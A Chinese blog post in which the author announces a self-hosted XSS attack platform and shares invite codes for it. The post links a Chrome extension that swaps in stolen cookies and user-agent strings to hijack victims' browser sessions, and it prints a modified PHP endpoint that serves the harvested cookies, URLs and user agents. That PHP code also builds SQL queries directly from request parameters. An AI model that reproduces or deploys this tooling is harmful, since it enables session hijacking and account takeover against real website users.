标签:des style blog http color io for ar 数据
原先一直用xss.hk结果不知怎么被关的,正好手上有代码于是自己搭了一个,网上的类似的xss平台大多一样,原先的xss的chrome插件,不适合 "manifest_version": 2,
而且很多其他的xss平台直接把代码拿过来,chrome插件的里面的许多代码内容跟xss.me这个与域名绑定的,而且有些加密cookie里面有浏览器的ua信息绑定,所以只用插件替换cookie有时候无法达到效果,否则得借助第三方修改header的插件,我们希望的是完全模拟劫持到的浏览器会话。
于是有了这一次的修改,php那把在/do/auth的那个接口返回增加了劫持ua的信息,点击口修改当前浏览器cookie跟ua来劫持会话。
数据放在别人那总归不放心,当然你也可以只用插件,填你自己的接口的信息,你只用插件来劫持会话,我也不会知道你的数据,不过你得稍微修改下php后台的的接口。
平台地址:
chrome xss mitm attack插件代码地址
https://github.com/lietdai/xss-mitm-attack
修改后的do.php
<?php /** * api.php 接口 * ---------------------------------------------------------------- * OldCMS,site:http://www.oldcms.com */ if(!defined(‘IN_OLDCMS‘)) die(‘Access Denied‘); $auth=Val(‘auth‘,‘GET‘); $db=DBConnect(); $project=$db->FirstRow("SELECT * FROM ".Tb(‘project‘)." WHERE authCode=‘{$auth}‘"); if(empty($project)) exit(‘Auth Err.‘); switch($act){ case ‘content‘: default: $domain=Val(‘domain‘,‘GET‘); $where=‘‘; if(!empty($domain)) $where.=" AND domain=‘{$domain}‘"; $res=$db->Dataset("SELECT content,serverContent FROM ".Tb(‘project_content‘)." WHERE projectId=‘{$project[id]}‘ {$where} ORDER BY id DESC"); $data=array(); foreach($res as $k=>$v){ $row=array(); $content=json_decode($v[‘content‘],true); $serverContent = json_decode($v[‘serverContent‘],true); $row[‘url‘]=$content[‘opener‘]?$content[‘opener‘]: $content[‘toplocation‘]; $row[‘cookie‘]=$content[‘cookie‘]; $serverContent = json_decode($v[‘serverContent‘],true); $row[‘ua‘] = $serverContent[‘HTTP_USER_AGENT‘]?:""; $data[]=$row; } echo JsonEncode($data); break; } ?>
发几个邀请码
71ac500c5a331cb7b2806a8e817f1672
34f3f778fa77c0f7fe8efb162ae70db0
df8825cf489fbca96a4663262afd02e1
65d17af1988fdde9f81696105c0ce3eb
4bdf5873cc19e995a925cbf203fdeeba
a66411d043503ea0bfe106a98a093c59
0695d3e66ab68d2b6d88949cbaf575c3
fb92a90b9a8264862699ed04a7d432a4
d358e24bc7ce3e81c73d54dbbb8b1195
禁止x政教=。=
标签:des style blog http color io for ar 数据
原文地址:http://www.cnblogs.com/l137/p/3938930.html